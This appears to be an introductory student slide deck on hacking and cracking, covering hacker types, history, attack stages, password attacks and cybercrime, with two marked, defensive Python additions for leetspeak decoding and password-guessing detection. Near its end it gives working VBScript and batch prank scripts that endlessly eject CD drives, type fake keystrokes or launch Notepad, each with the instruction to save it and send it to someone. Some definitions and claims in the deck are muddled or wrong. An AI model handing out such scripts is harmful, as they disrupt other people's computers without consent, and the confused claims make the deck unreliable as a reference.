Introduction of Hacking and Cracking
Prepared By :- Harshil Barot, Department Of Computer Science, H.N.G. University, Patan, Gujarat (India)
WHAT IS HACKING ?
Hacking is the act of penetrating a closed computer system for the knowledge and information that is contained within. Through the study of technology and computers a hacker can open his mind and expand his knowledge.
LEVELS OF HACKERS
• High-level hackers
High-level hackers are sophisticated users with large knowledge of technology.
• Low-level hackers
Low-level hackers are “Foot Soldiers” who mark programs with little understanding of how they work. Unfortunately hackers also gain the access of CERT (Computer Emergency Response Team).
A hacker is someone with deep understanding of computers and/or networking.
The art of hacking can be with positive or negative intentions.
WHO IS HACKER?
• HACKER IS NOT A CYBER CRIMINAL BUT HE IS A VERY INTELLIGENT PERSON WHO USES HIS KNOWLEDGE IN A CONSTRUCTIVE MANNER TO SECURE SYSTEMS & NEVER DAMAGES DATA
• HE KNOWS ALL ABOUT THE OPERATING SYSTEM & DIFFERENT HOLES IN THE SYSTEM
WHO IS CRACKER?
• A PERSON WHO ENTERS INTO OTHER’S SYSTEM AND VIOLATES THE SYSTEM, DAMAGES THE DATA, CREATES HAVOC IS CALLED CRACKER
• CRACKER IS CYBER CRIMINAL
• THEY CAN BE EASILY IDENTIFIED BECAUSE THEIR ACTIONS ARE MALICIOUS
1. Hacking - showing computer expertise. Unauthorized use of computer and network resources
2. Cracking - breaking security on software or systems
3. Phreaking - cracking telecom networks (Telephone Hacking)
4. Spoofing (Phishing) - faking the originating IP address in a datagram
History Of Hacking :-
• 1969 - Unix ‘hacked’ together
• 1971 - Cap ‘n Crunch phone exploit discovered
• 1988 - Morris Internet worm crashes 6,000 servers
• 1994 - $10 million transferred from CitiBank accounts
• 1995 - Kevin Mitnick sentenced to 5 years in jail
• 2000 - Major websites succumb to DDoS (distributed denial-of-service)
• 2000 - 15,700 credit and debit card numbers stolen from Western Union (hacked while web database was undergoing maintenance)
• 2001 - Code Red
◦ exploited bug in MS IIS to penetrate & spread
◦ probes random IPs for systems running IIS
◦ had trigger time for denial-of-service attack
◦ 2nd wave infected 360000 servers in 14 hours
• Code Red 2 - had backdoor installed to allow remote control
• Nimda - used multiple infection mechanisms: email, shares, web client, IIS
• 2002 - Slammer Worm brings web to its knees by attacking MS SQL Server
Types Of Hacker
1. White hat hacker :- breaks security for security purpose
2. Black hat hacker :- breaks security for unauthorised use
3. Grey hat hacker :- combination of white hat and black hat. They may offer to repair the system.
4. Blue hat hacker :- someone outside computer security who uses the system
5. Script kiddie :- mostly students. Use tools created by black hats
THE PROCESS OF HACKING
Some common steps that hackers have to follow are as follows :-
• Footprinting
Before the real fun begins for hackers, the three essential steps must be performed. Firstly, the hacker creates a profile of the company’s security posture. This is known as footprinting.
• Scanning
The second step is that of scanning, in which the hacker tests each target system to see if it is alive or not.
• Enumeration
Next, the hacker will try to identify valid user accounts and poorly protected resource shares, using the enumeration process.
• Gaining Access
For target systems running Windows, hackers can guess passwords for enumerated user names, using an automatic tool and a list of passwords to try, and can be successful if a strong password policy is not followed and account lockouts are not implemented.
• Tracks Covered
Tracks can be disabled and then enabled by clearing the event log.
• Backdoors
There is a keystroke logger, which sits between the OS and keyboard hardware and records every keystroke. On tracing its output hackers can easily identify what steps have been done before and thus can identify the username and password.
Why do hackers hack?
• JUST FOR FUN
• SHOW OFF
• HACK OTHER SYSTEMS SECRETLY
• NOTIFY MANY PEOPLE THEIR THOUGHT
• STEAL IMPORTANT INFORMATION
• DESTROY ENEMY’S COMPUTER NETWORK DURING THE WAR
What do hackers do after hacking? (2)
• INSTALL IRC RELATED PROGRAM
◦ identd, irc, bitchx, eggdrop, bnc
• INSTALL SCANNER PROGRAM
◦ mscan, sscan, nmap
• INSTALL EXPLOIT PROGRAM
• INSTALL DENIAL OF SERVICE PROGRAM
• USE ALL OF INSTALLED PROGRAMS SILENTLY
What do hackers know?
• DON’T KNOW HOW TO USE VI
• DON’T KNOW WHAT UNIX IS
• DON’T KNOW WHAT THEY DO
• KNOW HOW TO INTRUDE THE SYSTEM
• KNOW HOW TO CRASH THE SYSTEM
• KNOW WHERE THE HACKING PROGRAMS ARE
How can kid hack?
• KID HAS MUCH OF TIME
◦ Kid can search for longer time than other people
• ALL HACKING PROGRAMS ARE EASY TO USE
• KID DOESN’T HAVE TO KNOW HOW THE HACKING PROGRAM WORKS
• THESE KIDS ARE CALLED SCRIPT KIDDIES
How can be a real hacker?
• STUDY C/C++/ASSEMBLY LANGUAGE
• STUDY COMPUTER ARCHITECTURE
• STUDY OPERATING SYSTEM
• STUDY COMPUTER NETWORK
• EXAMINE THE HACKING TOOLS FOR A MONTH
• THINK THE PROBLEM OF THE COMPUTER
Why can’t defend against hackers?
• THERE ARE MANY UNKNOWN SECURITY HOLES
• HACKERS NEED TO KNOW ONLY ONE SECURITY HOLE TO HACK THE SYSTEM
• ADMIN NEEDS TO KNOW ALL SECURITY HOLES TO DEFEND THE SYSTEM
What should do after hacked?
• SHUTDOWN THE SYSTEM
◦ Or turn off the system
• SEPARATE THE SYSTEM FROM NETWORK
• RESTORE THE SYSTEM WITH THE BACKUP
◦ Or reinstall all programs
• CONNECT THE SYSTEM TO THE NETWORK
• IT CAN BE GOOD TO CALL THE POLICE
How to translate the hackers’ language (1)
1 -> i or l
3 -> e
4 -> a
7 -> t
9 -> g
0 -> o
$ -> s
| -> i or l
|\| -> n
|\/| -> m
s -> z
z -> s
f -> ph
ph -> f
x -> ck
ck -> x
How to translate the hackers’ language (2)
Ex)
◦ 1 d1d n0t h4ck th1s p4g3, 1t w4s l1k3 th1s wh3n 1 h4ck3d 1n
◦ I did not hack this page, it was like this when I hacked in
Protect your Computers!
• Use anti-virus software and firewalls - keep them up to date
• Keep your operating system up to date with critical security updates and patches
• Don’t open emails or attachments from unknown sources
• Use hard-to-guess passwords. Don’t use words found in a dictionary. Remember that password cracking tools exist
• Back-up your computer data on disks or CDs often
• Don’t share access to your computers with strangers
• If you have a wi-fi network, password protect it
• Disconnect from the Internet when not in use
• Reevaluate your security on a regular basis
• Make sure your employees and family members know this info too!
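The substitution table from the "hackers' language" slides is also what makes a password such as p4$$w0rd no stronger than the dictionary word behind it. The following is an added example, not part of the original presentation: it decodes leet text using that table and flags passwords whose decoded form contains a dictionary word. The wordlist is a small constructed sample, and the two multi-character glyphs are written in their usual backslash form (an assumption).

```python
import re
from itertools import islice, product

# Table from the "hackers' language" slides. "1" and "|" are ambiguous (i or l).
# The letter swaps (s/z, f/ph, x/ck) are left out: they collide with plain text.
LEET = {"1": "il", "3": "e", "4": "a", "7": "t", "9": "g", "0": "o",
        "$": "s", "|": "il"}
GLYPHS = [("|\\/|", "m"), ("|\\|", "n")]   # multi-character forms, longest first

# Constructed sample wordlist (assumption); a production check loads a real one.
WORDS = {"i", "did", "not", "hack", "this", "page", "it", "was", "like",
         "when", "hacked", "in", "password", "hello", "admin"}

def readings(token, limit=1024):
    """All plain-text readings of one leet token, capped at `limit`."""
    t = token.lower()
    for glyph, letter in GLYPHS:
        t = t.replace(glyph, letter)
    options = [LEET.get(ch, ch) for ch in t]
    return ["".join(c) for c in islice(product(*options), limit)]

def decode_word(token):
    """Prefer a reading found in WORDS; otherwise return the first reading."""
    found = readings(token)
    return next((r for r in found if r in WORDS), found[0])

def decode_text(text):
    """Decode a sentence, keeping punctuation and spacing as written."""
    return re.sub(r"[^\s,.!?]+", lambda m: decode_word(m.group()), text)

def is_weak(password, min_len=4):
    """True if any leet reading contains a dictionary word of min_len+ letters."""
    long_words = [w for w in WORDS if len(w) >= min_len]
    return any(w in r for r in readings(password) for w in long_words)

if __name__ == "__main__":
    print(decode_text("1 d1d n0t h4ck th1s p4g3, 1t w4s l1k3 th1s wh3n 1 h4ck3d 1n"))
    for pw in ("p4$$w0rd1", "4dm1n2024", "qZ7#vLm2&xPf"):
        print(pw, "->", "weak" if is_weak(pw) else "ok")
```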
Modes of Hacker Attack
• Over the Internet
• Over LAN
• Locally
• Offline
• Theft
• Deception
Why do Hackers Attack?
• Because they can
◦ A large fraction of hacker attacks have been pranks
• Financial Gain
• Espionage
• Venting anger at a company or organization
• Terrorism
Types of Hacker Attack
• Active Attacks
◦ Denial of Service
◦ Breaking into a site: Intelligence Gathering, Resource Usage, Deception
• Passive Attacks
◦ Sniffing: Passwords, Network Traffic, Sensitive Information
◦ Information Gathering
Spoofing
Definition: An attacker alters his identity so that someone thinks he is someone else
◦ Email, User ID, IP Address, …
◦ Attacker exploits trust relation between user and networked machines to gain access to machines
Types of Spoofing:
1. IP Spoofing
2. Email Spoofing
3. Web Spoofing
Password Attacks
A hacker can exploit weak passwords & uncontrolled network modems easily
Steps
◦ Hacker gets the phone number of a company
◦ Hacker runs war dialer program
  - If original number is 555-5532 he runs all numbers in the 555-55xx range
  - When modem answers he records the phone number of modem
◦ Hacker now needs a user id and password to enter company network
  - Companies often have default accounts e.g. temp, anonymous with no password
  - Often the root account uses company name as the password
  - For strong passwords password cracking techniques exist
Password Attacks
Two kinds: Password Guessing and Password Cracking
Password Guessing: Attempt to guess the password for a particular user ID. This process is rarely successful, time consuming, and generates a lot of network traffic. Also, some accounts are locked out after a set number of unsuccessful guesses. Many password-guessing tools can be found at Packet Site:
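Because password guessing is noisy and lockout depends on counting failures, it is straightforward to detect from authentication logs. The following is an added example, not part of the original presentation: it applies a per-account lockout counter and also flags a source that tries many different user IDs, which a per-account lockout alone does not catch. The log format, thresholds and all log lines are constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (assumed format: timestamp result user=<id> src=<ip>).
LOG = """\
2024-05-01T10:00:01 FAIL user=root src=203.0.113.7
2024-05-01T10:00:03 FAIL user=root src=203.0.113.7
2024-05-01T10:00:05 FAIL user=root src=203.0.113.7
2024-05-01T10:01:00 FAIL user=temp src=198.51.100.9
2024-05-01T10:01:02 FAIL user=anonymous src=198.51.100.9
2024-05-01T10:01:04 FAIL user=guest src=198.51.100.9
2024-05-01T10:02:00 FAIL user=alice src=192.0.2.10
2024-05-01T10:02:10 FAIL user=alice src=192.0.2.10
2024-05-01T10:02:20 OK user=alice src=192.0.2.10
2024-05-01T10:03:00 FAIL user=alice src=192.0.2.10
2024-05-01T10:04:00 FAIL user=bob src=192.0.2.11
2024-05-01T10:14:00 FAIL user=bob src=192.0.2.11
2024-05-01T10:24:00 FAIL user=bob src=192.0.2.11
"""

def parse(line):
    """Split one log line into (timestamp, result, user, source)."""
    ts, result, user, src = line.split()
    return (datetime.fromisoformat(ts), result,
            user.split("=", 1)[1], src.split("=", 1)[1])

def detect(log, max_fail=3, window=timedelta(minutes=5), max_users=3):
    """Return (accounts to lock out, sources guessing across many user IDs)."""
    fails = defaultdict(deque)   # user -> timestamps of recent failures
    tried = defaultdict(set)     # source -> distinct user IDs it failed on
    locked, sprayers = set(), set()
    for line in log.strip().splitlines():
        ts, result, user, src = parse(line)
        if result == "OK":
            if user not in locked:
                fails[user].clear()      # a good login resets the counter
            continue
        recent = fails[user]
        recent.append(ts)
        while ts - recent[0] > window:   # forget failures outside the window
            recent.popleft()
        if len(recent) >= max_fail:
            locked.add(user)
        tried[src].add(user)
        if len(tried[src]) >= max_users:
            sprayers.add(src)
    return locked, sprayers

if __name__ == "__main__":
    locked, sprayers = detect(LOG)
    print("lock out:", sorted(locked))
    print("guessing across accounts:", sorted(sprayers))
```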
Common scenarios in Cyber Crime
Unauthorized access: This occurs when a user/hacker deliberately gets access into someone else’s network, either to monitor or for data destruction purposes.
Denial of service attack: It involves sending disproportionate demands or data to the victim’s server, beyond the limit that the server is capable of handling, and hence causes the server to crash.
Virus, Worms and Trojan attacks: Viruses are basically programs that are attached to a file, which then gets circulated to other files and gradually to other computers in the network. Worms, unlike viruses, do not need a host for attachment; they make copies of themselves and do this repeatedly, hence eating up all the memory of the computer. Trojans are unauthorized programs which function from inside what seems to be an authorized program, thereby concealing what they are actually doing.
Email Bombing: It refers to sending a large number of emails to the victim, resulting in the victim’s email account (in case of an individual) or mail servers (in case of a company or an email service provider) crashing.
Internet Time Thefts: This connotes the usage by an unauthorized person of the Internet hours paid for by another.
Web Jacking: This occurs when someone forcefully takes control of a website (by cracking the password and later changing it). The actual owner of the website does not have any more control over what appears on that website.
Theft and Physical damage of computer or its peripherals: This type of offence involves the theft of a computer, some parts of a computer or a peripheral attached to the computer, and physically damaging a computer or its peripherals.
Think before you Click
IP ADDRESS
• IP ADDRESS IS THE ADDRESS OF YOUR COMPUTER IN THE INTERNET
• IT IS UNIQUE
• LIKE 192.168.23.45
Knowing IP addresses
• IP address is a unique web address for each computer connected to internet
• Knowing this is essential before anything else
Symptoms
• Targeted Pop-ups - SPYWARE
• Slow Connection - SPYWARE / TROJAN
• Targeted E-Mail (Spam) - SPYWARE
• Unauthorized Access - TROJAN HORSE
• Spam Relaying - TROJAN HORSE
• System Crash - SPYWARE / TROJAN
• Program Customisation - SPYWARE
Small Notepad Virus :-
More Notepad Viruses
1) Continually pop out your friend’s CD Drive.
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
      if colCDROMs.Count >= 1 then
        For i = 0 to colCDROMs.Count - 1
          colCDROMs.Item(i).Eject
        Next
        For i = 0 to colCDROMs.Count - 1
          colCDROMs.Item(i).Eject
        Next
      End If
      wscript.sleep 5000
    loop
Save it as "Anything.VBS" and send it.
Hack Computer keyboard and make him type "Keyboard not working" simultaneously:
    Set wshShell = wscript.CreateObject("WScript.Shell")
    do
      wscript.sleep 100
      wshshell.sendkeys "Keyboard not working"
    loop
Save it as "Anything.VBS" and send it.
Open Notepad continually in your computer
    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top
Save it as "Anything.BAT" and send it.
LIST OF SITES THAT WERE HACKED
• Monmouth Army Base --- http://www.monmouth.army.mil/
• US Army --- http://www4.army.mil/
• The Jerry Springer Show --- http://www.jerryspringer.com/
• Symantec Corporation --- http://www.symantec.com/
• U.S. Department of Commerce Institute for Telecommunication Sciences --- http://elbert.its.bldrdoc.gov/
• Technical University of Denmark --- http://lanpc11.ilf.dtu.dk
• Illinois Natural History Survey --- http://nuclear.hazard.uiuc.edu
• Monica Lewinsky’s site --- http://www.monicalewinsky.com/
• Phoenix Data Systems --- http://www.phoenixds.at/
• Ruchi Group --- http://www.ruchigroup.com/
• Concept Reseau --- http://www.concept-reseau.fr/
• Wayne University US Department --- http://www.us.wayne.edu/